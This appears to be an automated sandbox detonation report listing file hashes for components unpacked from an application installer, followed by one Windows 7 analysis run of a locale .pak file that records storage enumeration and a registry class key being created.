SHA256 2bceef4822ca7cc3add4a9dcb67c51efb51c656fce96a3b840250de15379959c
SHA512 3b745740bbbe339542ef03fd15dd631fb775e6bf8ca54d6d2b9cead3aa5aafc4cab49e507bc93641e581412bbeb916a53608d5f5d971ea453779e72d2294dafb

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\vk_swiftshader.dll

MD5 0b0658bf4f8cf397e1deddc50d67523f
SHA1 8fcf0726ee1272a3d5c65d50be1626f1b1f49477
SHA256 94adcd97d1cdd459d21f0b5b57e0caf4c5c6e44f7bc6fc6a73f0bd133e8d551e
SHA512 d745424644b66783dc8cf6dd043f27356f25afcda679ed43672fc0caf33c7339006f033e0fb392c865a5eb3e9f0e5edf37154e77121ba5a71893420da26b7cd5

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\vk_swiftshader_icd.json

MD5 8642dd3a87e2de6e991fae08458e302b
SHA1 9c06735c31cec00600fd763a92f8112d085bd12a
SHA256 32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9
SHA512 f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\vulkan-1.dll

MD5 d421ae53119ed85e1e90b073eb51d7d2
SHA1 014f0f98a2271d385d57152a15f5d8a763d27c14
SHA256 3a433f9cbee4cc89ac58917f1872ee0f38ba451760d4bba6f37712f0c8179b7a
SHA512 8b36d24496ff5253a375ee72de616cbc165f815f8d1ee339955b922846b1e0de015f86ff45b8ab710d0ecf162fe3c6c801774b889cdfc35feb6baf5d12d67bdd

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\af.pak

MD5 917a688d64eccf67fef5a5eb0908b6d4
SHA1 7206b01bbc3fd8cc937db9050dd8ac86cf44d8cc
SHA256 6981249837ad767fc030edc8838878a5e493fb08cc49982cffaed16cfbeb564d
SHA512 195dbec8463cf89990232296c5c927e1501f0c2e01a7be7c6a6acae651853ce1edb23d639af65979b39a3c61979119c3a305acfa3aadf0cb93e241c5e57f4534

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\am.pak

MD5 3cfd7c5bb92ab72c63e003208a9e4529
SHA1 165d2f69ab6a6e237f0fec943b5577123cefea87
SHA256 12e9e1bec1c46e5ea706157726e17a4429acf288a5754fa183bd9b4cf7d3853b
SHA512 cd7c7837d758ea66abc871503cda6fe99ff45990405e60c1133e7c1f4cb29ee69723c9558bb2d3eccb42948da57351f4f095062616686ab2e255acd3c86236f0

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\ar.pak

MD5 3c2ab7363018db1f20b90acbc305cb4c
SHA1 60b9cf453178ad0e60faf20d137a0c7eabde65c9
SHA256 3ca47b9c436723f837a53b2904b51efdf13ab6cad2f3ef4fe48a1115847eccbf
SHA512 589beb3e95e93f30341933c9b9826210e6bf3e9c1ad8f113d9d8a98fa5a526f81e454ee3357fb55d60d67a4890ce33e964ba2fa810e1771a6b7e82746492313a

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\bg.pak

MD5 a69f6075863d47b564a2feb655a2946f
SHA1 062232499ff73d39724c05c0df121ecd252b8a31
SHA256 a5eb7038ed956bad7704a722f05691474ff709dffbad92b8e31dbb869ad58334
SHA512 930ce3938aa02a8bcc609a64bd86b7e6164d63baad157a980fd079859a6bee5db87bd1f7a74a71108f8368bc9c6154bf14a2dba1abf269f572bc262614bcf1db

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\bn.pak

MD5 d43ce80ddca3fab513431fa29be2e60a
SHA1 3e82282e4acfec5f0aca4672161d2f976f284a0c
SHA256 87670ff2ceb1ebc38fce2c3b745ac965f3de5de3133d99ed33933a8f3e99d874
SHA512 1d33ca9bacb91ef328f89a14777a704000bf30fe59aa1cbbbff34d8bad266c98d78c9e411e289e834e76eb721dd98934426a565cd5b3436d5a103abe37f7612a

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\ca.pak

MD5 2d30c5a004715bc8cd54c2e21c5f7953
SHA1 fed917145a03d037a32abac6edc48c76a4035993
SHA256 d9c45d55a9a5661063b9bbebb0615de8f567f3925d04fd10938da9617c6220e0
SHA512 b3803551f53d290d8839789f829afc9c1e12052c81ba20d5e01fb3d2bacd5d1e97bd4c05074322eed17fdec04c9176c655076faec8a3aef17c39fb999e0c1fcf

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\cs.pak

MD5 06e3fe72fdc73291e8cf6a44eb68b086
SHA1 0bb3b3cf839575b2794d7d781a763751fe70d126
SHA256 397134d1834f395f1c467a75d84ef2e8545cb0f81e94dbe78b841fbbdaad802d
SHA512 211594c30ad4f5ca8813596b59751168c60dfa0d13f24f2aa608fce82d21c2de3de69fe007c4bde1602da8aa7ea81ec0f15e173abc1224362c36b493b425b425

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\da.pak

MD5 1939faa4f66e903eac58f2564eeb910e
SHA1 bace65ee6c278d01ccf936e227e403c4dff2682d
SHA256 0b9da7bd6531a7ebe7d8188b320c0953adcfbaf654037f8265261a12e63d3c87
SHA512 51588d2fe724e6c407724ea6f46883ded39397af744effaf672f75952a6a734e61e93e59f446080317f2a2b3fa1b45e7405f90fe0b226c44c9f3dd9a4e130a87

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\de.pak

MD5 2163820cd081fdd711b9230dc9284297
SHA1 c76cc7b440156e3a59caa17c704d9d327f9f1886
SHA256 6d787033c94755cc80c187ed8a9de65808bb4d7968354bbb94b7868ac2e8d205
SHA512 920fa2a10f7aa7f1f6d911fe2a77eded0384617d8fd863943afd99a584dab3fb2ea3e5d2e20bca529689a99fdf303912007f2918c62482d8a90194a810f6e535

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\el.pak

MD5 a14d8a4499a8b2f2f5908d93e2065bf7
SHA1 1473a352832d9a71c97a003127e3e78613c72a17
SHA256 eb46d9860835b69d33b2583d1e52b20238b666b967bf00906424e3c8a161ed64
SHA512 427271d12590f8ea3f11b83e4c0ce79c55c289573c5f6e5c70c789b28a5181f295a3c9b1a4bdd1f731f338e6edb1e06318ea6410ceac546128a84ff8f2ec0b40

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\en-GB.pak

MD5 9d9121bdc9af59b5899ce3c5927b55d8
SHA1 568626a374cd30237c55b72c74b708da8d065ec1
SHA256 f4d45ccc89834376f35d4d83fe5b2d5112b8cc315fcb03228720749aae31c805
SHA512 149a8acf256dc12f62706f72ad8ec88cbfdf7f8dc874bcd9facf484cdb00e7c5787f5e1bbc12b5bbe1b19b6524e7e8a1c7dba2838abeb9aafa3ce89795fd22ae

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\en-US.pak

MD5 626f30cfd9ad7b7c628c6a859e4013bd
SHA1 02e9a759c745a984b5f39223fab5be9b5ec3d5a7
SHA256 0fd74bb69ad35b3f9391fa760bf0eb0ee73d2bea0066244577ef2abd269513de
SHA512 9ce902f21fef70c5b5af444b532b36c9a00d896878cb4021c9b1dc07aa3277d956bca65ee0adb68467eec113e535b60a8a5fb5414c7d0ca761ceae5c43b7d9a9

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\es-419.pak

MD5 6f4613a4a88af6c8bd4ef39edeee3747
SHA1 c8850a276d390df234258d8de8c6df79240c8669
SHA256 8f7b8776e61e3ed5aa33b1a571ac834653b54b12a499d956b95d567b7e1ba987
SHA512 e5933dcb2aaaa2018ba8b13f4af3dc8a950640ac60acb1b56ad6de24541701d0ffc1f4cb28c7932af924bfd673edcee20bf649156ab95ea9499ec43c703ea141

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\es.pak

MD5 a24e01a4947d22ce1a6aca34b6f2a649
SHA1 750c2550465c7d0d7d1d63ad045b811b4a26dc55
SHA256 848d422be1b8fae74786ed6d6dfa7dd2e97b798b4a9ba1d929085e425b2a54e0
SHA512 02fc4ce96aa523ebc204243bbec3347b09cb20bcc0ba66cf9532a6fb26c48f7f2396bbb833f1916f8f081ffc9c6cd2de07315e66c5115042a0b44270fa4468c1

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\et.pak

MD5 82a07b154cb241a2ebe83b0d919c89e9
SHA1 f7ece3a3da2dfb8886e334419e438681bfce36cf
SHA256 84866ccaf2ec39486f78e22886bef3fe75c1eb36e7a7c071471040e12018db28
SHA512 07319d155bdf9e27762ecb9ef6871430bef88b1af129450eb65aa798ebaa4e02b25b0cf9bde3b12ff1b04a3d14241569b73d6af895d2e85dd7b24d393e7317e9

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\fa.pak

MD5 c770cfb9fbabda049eb2d87275071b54
SHA1 20e41b1802c82d15d41fadaf3dcd049b57891131
SHA256 dae7e7c87026cd4e8a4cd813cc71def32c86ed47865ce6da5383b66b7021c5bc
SHA512 cda117a60c853f12ade579c34fce22d992b33df1f5001a237767b6e642d5c775c3387bcee05d6557fe5a2f6235f93258954a697d3b9812d2550c4801869f4751

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\fi.pak

MD5 fe011231bbc8b3a74652f6a38f85bc88
SHA1 2b851e46738d466b3a5a470de114d15051b6eb6b
SHA256 7a3249514585491eb47fe4b579edc27ccc48761e7ad6bc11d113b257132c5dd2
SHA512 2a4e5c1409347b4b514556c81ef32c8ae118add28e3469717b13045c8424fed9b817c7988629050ed3e732e0cdca181891b6a8b9e64e4c8d65f004d7c8db9796

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\fil.pak

MD5 7354de570c8132723c8e57c4ccb4e7c4
SHA1 177780faf460e3c8a643a4d71c7a4621345a8715
SHA256 91149190c856195fb330605686acf09c7197e5b7efe37fe2a7c76bb8fb08cc89
SHA512 a8487a6a7fd46d62e78ca4262de49e12c120268561ee61a642c45efa48116edebeb40cf9e8be229db0bbf06bb6b5457cc54399a08ee6a603e5540ef5ca482798

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\fr.pak

MD5 d8b4bc789a0c865fb0981611fb5dcdbc
SHA1 33f9f03117f0bba56a696f2fa089ba893ee951a2
SHA256 52aa0a18ace6347b06a89e3851a1b116812c022dbe41da8942278878b5409cee
SHA512 58d19e5a3c68c901fa2a0c327a45b410ab9b9e6c39298db48eed25345453dce1a4633afe6277cf53ed558e160065b89c0e38a32caeced47e79783dbda4d74f26

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\gu.pak

MD5 225167dbdf1d16b3fafc506eb63f6d1d
SHA1 8651b77f41e3c5b019ccb124a7c8f6449a04b96c
SHA256 ff379dd77136b9b85e7e9fcb5b261ace9c6d9184af3ba2dea35b1757b9bab6d9
SHA512 a353d36a87b6608578816056647de45a456f9012d399b2cb5cb7b9de867a370fcaf1a90d293f367b9b678d13991294425abd85cf77e971afa0d3e9c316952115

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\he.pak

MD5 d8320b09c1e138b00655db0802687bca
SHA1 01616bda6b22c70d5c6440b7451ae736eb1336cb
SHA256 e3336668aad9ad661e7f589f1a405b9c95fc771261cdf9328aca88f4be763374
SHA512 5a91596d7e82dc3d692083ae45aff6fdbddd08ca17f49a020e0769f98c4218b6c9cd31e54524473b7cdccbebf4d7a7f0ff23b5075a1e1ada5cc35c3fd0172bed

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\hi.pak

MD5 9e1788b0f3e330baf2b9356a6c853b20
SHA1 a2f4b37a418669e2b90159c8f835f840026128d9
SHA256 c640313e10e985a58d16f928d2428ae278421a070d948733ac68fdf7312090fd
SHA512 b9a577e084f8daeb53fad0a9423661c99cab272125899a16b0b052606a2cb88f823137f3a21b5c06b10e0235321b7faca84cd759bf406fb2dd02c2f598e92cb5

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\hr.pak

MD5 af7aec4b45ead620463b732e16f63e47
SHA1 e6838c56b945c936fdb87389fdc80cdf7bc73872
SHA256 bfeeafe2f8a9f797d20c4209181c4768fbea4a61ff2dc1f57f6cd18bc872fc13
SHA512 784ff8dc6011883e931b4b8371e5ada960120931bfdf24f81648f5092fa31db1d03e5d3cf5cd16d57ea7fb7877bb25a28533085ab42bfe40dc25ca7d9cee7ade

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\hu.pak

MD5 b93beeb1e35a29b310500fa59983f751
SHA1 45c0b2cab4c4a820cfc2aed4b7236ddc79a0db00
SHA256 bab09c3cb80130a4a288642633c2b31ab08b1757466d9a468bc36d276079f002
SHA512 249de5b8bd7c4755caa8b9552254d353b0d885b63bd5f7c6c8e29b3f4e447c9e8d6c0e88d5aaba0b898aa26880592b3904e19ca4797a2ac1dd757aaee782c37c

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\id.pak

MD5 bc719b483f20e9a0b4b88969941c869d
SHA1 4d926a9aba7c350e9da8aa570a9f52534c81aa88
SHA256 f175e58be47b228803aa32d2695e2fcfaf4655b65b96fb6b539b3e59593e6799
SHA512 ddf6108888676c1a90865daaa88198b681b685d9047b0e10f5aa08daa39a628a84732a8518606176529297bec51ce8bc39e910eeffc8b88e9585fafb694c35db

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\it.pak

MD5 ab160b6e8bbaba8f8bde7e2d996f4f2e
SHA1 eb7eae28a693337b8504e3e6363087b3b113bc72
SHA256 e86ba661b3f6f7ecd2312fe90b873330c0d6516a5501a0f326875844e8d4b289
SHA512 14e8919e2f5a7ad2b3f310ffec590b221e6e0dc45f37efc57ff9b8ff7a3ca674d6f4b9bd65e49a98af6726fa953f2168e5c8e6101ed977e8c7ff4a51203f8d4d

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\ja.pak

MD5 dee9626a8d7cacc7e29cff65a6f4d9c3
SHA1 5c960312f873ab7002ed1cce4afdb5e36621a3ce
SHA256 63ad3974baa8c160ba30448171f148d008ac19e80010fb13d3a65cf411b67ae0
SHA512 ee80d58886f4ac378d6491e075062c171a715af7c42dd1785952b25a572381acd722764e8be914adbfccf2a5fa4a51968b989b632eefb9d636851f1b8ffb82e1

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\kn.pak

MD5 32e5f528c6cee9de5b76957735ae3563
SHA1 74a86191762739d7184b08d27f716cfa30823a98
SHA256 cd297f7e872b34e63ca2d98dc2fa79085e8a2985ba8757601e4b901a3f30b013
SHA512 92d100b1289e63fd0dc65657fb4b1e16f298735e6cd066e9122d04e3b79e0d286f15fc9f1da2c3a05af528b92bde95fcfbc493c466db2d94a0749adfbf7fb8d5

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\ko.pak

MD5 38a95d783d627e9a83ad636faa33c518
SHA1 cb57e8e9ef30eb2b0e47453d5ec4f29cea872710
SHA256 0d9b23e2981412d11ecea3ade8d521a073802d9431c39d72b88f62b98e50a96b
SHA512 4119b8f82107473c941c9e10b6bae97d60c9c47570cc2b40f429a95f4f5cca77eecbacd7023af439429026f6e55ad9df19998c8b98be0d04d384b310d025c0dc

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\lt.pak

MD5 3e9119a712530a825bca226ec54dba45
SHA1 10f1b6bf2fa3a1b5af894d51b4eb47296c0dbc36
SHA256 3da531a9a5870315823e74b23031cb81379d2d94ae9894a7fb1d8a8ad51a2da9
SHA512 765c872cafa1b266575b0cac09dfa796cdb860bd82e1c657397fe2aada11771f306b0a1776e4d66ff41e94b153c812592430f31e7b1ff97abe7d8e6b96d321f1

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\lv.pak

MD5 e75cdda386dd3131e4cffb13883cda5f
SHA1 20e084cb324e03fd0540fff493b7ecc5624087e9
SHA256 ae782f1e53201079ca555baa5ec04b163188e5161242d185f04a606a49fc8c0d
SHA512 d27bc61028031946ed6708918f921c3d681c8962b8d5507a91ab6576e3b2c462524e550305db87ede886e41fb0e49edec2d84cdbbad675282105627e01d98bf5

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\ml.pak

MD5 6e96eddfe80da6aaa87f677feef4d1d6
SHA1 8a998785d56bc32b15cee97b172cd2dcdc8508d9
SHA256 e2fb73353ab05eb78f9845bdbdf50b64c9fb776b7f08948f976fe64e683397c4
SHA512 feea11dfc6ec153ab903b5828306617eedeee19daa73bd046ae47757795fecb9abce6192bb3a9561aaace7fc85ee442057b93081c6c986855b819fd38815e6f7

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\mr.pak

MD5 fda40999c6a1b435a1490f5edca57ccd
SHA1 41103b2182281df2e7c04a3fff23ec6a416d6aa9
SHA256 0ebb125a0bdfd1e21b79914ca8e279790d41f7bac35bf2d031dd7981f1c1c056
SHA512 666ceb24d2e568a00a77512295e224a6545bf6abcfa19c93aa823db5330117fcb39fde570e7601dbd41976950c3ec03634f89fc5d9203357515e6651ab0b6d32

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\ms.pak

MD5 73096184d7bd6a9a2a27202d30a3cfa1
SHA1 ea711b29787aa8b9e9af6bde5b74103429e5855f
SHA256 d1072514bab63af5dfbf923175d491787139f0c1b6361acb23e67543836c84ba
SHA512 e3fbee4896554e502c222b5ffe38e9d61e9db4d18cdc92ce5118b819dc60789bfd6d6c7f8444ff1763222455ab91e79bfe500e75c0e06b0de70c2c64fb043c6f

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\nb.pak

MD5 28cc86c7204b14d080f661a388e7f2c0
SHA1 e0927ea3c4fd6875dafd7946affb74ad2db400f5
SHA256 9253122d94ccea904fb9363b8178ca9335b8380b7891f1a7a22afb3113309e72
SHA512 e2524e10d145f95c028d65e47cf06fc82c7a43fcf0ecf01202278c7fb14079c03e9434e8039fd96aaee870872c9896d9f0ed575e50c19a3781cb0c94fe59b3a5

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\nl.pak

MD5 7fc6ae561fd7c39ff8ba67f3dbaa6481
SHA1 2e3977403a204c6f0ca9a6856bb1734490a57e72
SHA256 844031e1de2b2872d12d5b7d42adf633c9d4b48169b1b33b7492b3b060c73558
SHA512 90294ae24b7db003bc34a48f98d9e1887e87c6f605defe01ddcf9187429e8446c04a7f94bb6aadc8e61c98842163bc3702b414393ab836eb0bee038f09481c2b

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\pl.pak

MD5 ba7a9aba68211d8639dffae0ef8b88da
SHA1 a9a26b8f0902475cb576967cbe9013028cb21da4
SHA256 60aa08598a81bb46ddc64a5ab0852565554c6e6262e9c5dfee09f4e3fc08d5fe
SHA512 a1b8bfc3e19aa1267e31838e1c1f2b0b1cfcdf56f84e967088d626b58ec64b3305043a14b12fd080498ee1d74a4192453914c393ce8f848ea5616cf88abc4eb5

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\pt-BR.pak

MD5 53d5fb849c9bab70878b3e01bffad65a
SHA1 e72af1a76539e66cef4a4eef5844b067a4e1a79f
SHA256 40dd24c5e225ed941bbaab3dcfefa993e39fbc75a1798f4f6e06424956698ac5
SHA512 55357643d789d2eed72e009f08f72ba4895ba455ca00c8347a3c3790e43f8d7e4625feda438ecac840bdc52c26d2135d89bea693b61a293922b6056bde6b4516

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\pt-PT.pak

MD5 0237374730fa1a92dec60c206d7df283
SHA1 62dbbd855d83ef982a15c647b5608dafb748745a
SHA256 2fb2fd2e32b952dcbc8914f9d3aaf02bf2750b72abfee2e8b2bb08062ddd9934
SHA512 63ec4ec44002724e22703a3bd952d1ff4062b367c4f5e3f106349bd226ad1317bef2e371fda0e099ea5c0afd32a9d2c1246c93c18d73dccf8fc2c1644a6fb6b2

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\ro.pak

MD5 4e692489e2ae74a4a11ca0a113048f15
SHA1 cb2b80217d5372242d656ac015c024fe1e5e77b7
SHA256 4a2a305668f1926cfe4bb72e8fbfde747c83ac4dd9cf535c13ae642d0b96fb79
SHA512 8ad9e0a79137a862def24d6963536e75b87bb71ab74dbdd43531c5c95ddd3cd834f22c6a8e3a1e03aad35ade65ecd227d5101b5be3ce3f0b7b471f5136cfd77c

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\ru.pak

MD5 1a9b38ec75ccfa3214bef411a1ae0502
SHA1 de81af03fff427dfc5ffe548f27ed02acae3402d
SHA256 533f9e4af2dce2a6e049ac0eb6e2dbf0afe4b6f635236520aee2e4fa3176e995
SHA512 05cf20aea71cdd077b0fa5f835812809ad22c3dbebc69e38ab2c9a26ad694ab50d6985aec61633b99713e7f57408c1c64ce2fb9ccdac26661b7167853bdd6148

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\sk.pak

MD5 f117e58e6eb53da1dbfa4c04a798e96f
SHA1 e98cee0a94a9494c0cfc639bb9e42a4602c23236
SHA256 b46db20eeba11f8365296b54469fdd001579852dc1d49a01fc59d2a8bcf880a3
SHA512 dea792a63e0557d9e868c0310ec2a68b713daf5cf926389e05a0885cdb05433d20f35d087de269f9584795da50600966b8ff5dd95583861443a1e90564a89793

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\sl.pak

MD5 435a2a5214f9b56dfadd5a6267041bd3
SHA1 36bbc7ca3d998bfb1edc2ff8a3635553f96ca570
SHA256 341c33514c627501026c3e5b9620cf0d9f482ab66b10a7e0fb112c7620b15600
SHA512 55271935e18ac27c753431af86a7dcd1f4a768adef1b593ba8e218da34856a5f9faf9819a3ecce3f21f0607ba95100c5cb18cd1a7138ec563090d0391ad5b52d

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\sr.pak

MD5 8f58b2463e8240ef62e651685e1f17d8
SHA1 6c9f302aed807a67f6b93bcb79577397a5ad3cf7
SHA256 5a55320d6953efb5b565893e32e01f6dae781a16460df5502c8ba012c893edfd
SHA512 6076d43a73d5fa5192cbe597e018b268cfdc7efb94a6cb45dad5b0da9c3abf68aaf2ea06f3ad650b28a993605917b6d356339d79f8dd6962d2c40dbf4653ef83

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\sv.pak

MD5 e4c9ced1a36ea7b71634e4df9618804f
SHA1 c966c8eb9763a9147854989ea443c6be0634db27
SHA256 e5cccdb241938f4a6b9af5a245abe0e0218c72e08a73db3ed0452c6ddfb9c379
SHA512 d07a4d62f22a1830d3ec44f0c347e4a7d70b35ceba126cbdc246a7b3ee7eda85e2338bab3edc7223f579964868136bb10d42c05e0e0ff9f73447b3606d9b2c4e

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\sw.pak

MD5 59ff4e16b640ef41100243857efdd009
SHA1 f712b2d39618ffadcf68d1f2ab5a76da5be14d74
SHA256 c18a209f8ec3641c90ea8ced5343f943f034e09c8e75466e24dcabc070d08804
SHA512 0e721a6cbf209ac35272ad292b2e5000d4e690062ddb498dbf6e8e6ee5f6e86d034a7303a46c2b85750245381c78efafc416ead13c1fe0ee5ec6088dd66adca2

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\ta.pak

MD5 5f80c9da0c09491c70123581a41f6dad
SHA1 3fc9560a954271cf09aaa54eec34963c72c06e85
SHA256 30658d99d753946e9c9c02094c89be25b710db77251df6cd1a8839c29de5f884
SHA512 072c5db7fe1eb9e6c270d0e9b439cf84ebb3dc374d4f01f01f9341030883f2d6d9c6970fb6ef14bf96fccb51eade9ca762f396f89ba1d3df1230dda68557fd4a

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\th.pak

MD5 4917873d8118906bdc08f31afb1ea078
SHA1 49440a3b156d7703533367f8f13f66ec166db6e9
SHA256 d051b400096922089f6daa723fac18c9640ba203b2879aac4ca89b05738dd32d
SHA512 30e6446bad54b86be553fa293c7a92ec221adb54b99624ed69702df75347a98697158041a45f77ece4e7ed0fda41306ef21eb27981f24f0a4e42e8306175a88e

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\te.pak

MD5 17b858cf23a206b5822f8b839d7c1ea3
SHA1 115220668f153b36254951e9aa4ef0aa2be1ffc4
SHA256 d6180484b51aacbf59419e3a9b475a4419fb7d195aea7c3d58339f0f072c1457
SHA512 7b919a5b451ec2ba15d377e4a3a6f99d63268e9be2865d674505584eed4fa190eaae589c9592276b996b7ce2fdfae80fda20feff9ea9adbb586308dfd7f12c2a

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\tr.pak

MD5 55e06cd9356d0fb6f99932c2913afc92
SHA1 aa5c532ddb3f80d2f180ad62ce38351e519a5e45
SHA256 afcbf02420dc724059f70d1dc6ffa51f5dd75136d9e1e8671d92d5d14955edf9
SHA512 813c180cb1aa205034497be5fc8a631ff117e5ed17cdf0ac59b7569d74d849b385852a15bbadd3146f942c58bab80d94bf0980d13ca4b4424d1cb1df0cb1a2cd

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\ur.pak

MD5 861ffd74ae5b392d578b3f3004c94ce3
SHA1 8a4a05317a0f11d9d216b3e53e58475c301d7ea5
SHA256 b9f22a23368bf1e21f3085583ecb775cce8045176721ff6ae798b06bd2810dbc
SHA512 52ede35b7ed1fb6e51b18e450b95c3245d326f2afda646e3642ee68b714dcf9a726afe32e2759e9ea87a104f4a59e6fc2c60b3275aad8332ae1c626231e6747b

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\uk.pak

MD5 381cb33c2d4fd0225c5c14447e6a84e0
SHA1 686b888228f6dd95ade94fee62eb1d75f3e0fc93
SHA256 c2a6b16abeab6e18276bc1636555e93218763b9c99cacd0b42481b35e3a11820
SHA512 f7a2828aa4cd85f07a5d66832f247f70951abf34f81a282dc41ec51875ba70d940353d010b605c56cc59bee47309aa311099d4e6ebd17f3c1538521d0cddf4b6

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\zh-CN.pak

MD5 3210460a24f2e2a2edd15d6f43abbe5f
SHA1 608ff156286708ed94b7ae90c73568d6042e2dbd
SHA256 0f8d42d7f0b0b01aafad6ae79f0bd0ca518b2db94287b09df088bc093f15f605
SHA512 f97427dba4217e01a7ed395c453d03dda4f2258cba589258da0eacfde427bf442cddef541a23e7782914433e70a9623e904a5070deba9f9d50dda20732eb5e86

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\vi.pak

MD5 4076d3c0c0e5f31cf883198c980d1727
SHA1 db51b746216ea68803c98d7c1a5a2b45944359f3
SHA256 f1458c4ce4ca708e849eb0c68a5157360ef003f3a9c95628d5ca12ada303b379
SHA512 80e4e960218f7d84423124c34352251411baf008e821a344a0b6c2e7f1483694010f28b7de21c7e2c69abb4ec92e0d9cbddeed6279b90c47245f4cbc500cdb77

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\zh-TW.pak

MD5 f466116c7ce4962fe674383d543c87f6
SHA1 f65bf0dc1f1b15c132674fb8ff540f7d2afe1d6e
SHA256 ff3a294fd1afb1fa7aaf53fbc4396643a12ed132633c5c86f14c16b88fa94a7b
SHA512 4851a08069fcac75e4051e53d4526789bfe6c393ab963e8263803bbf6e96cb150e9ba741650efb5ee500e8a757d8512eb17dc268cec1ab6fd3acfac62f7da27d

C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-13 00:12

Reported

2024-06-13 00:18

Platform

win7-20231129-en

Max time kernel

117s

Max time network

125s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\locales\pt-PT.pak

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file\ C:\Windows\system32\rundll32.exe N/A
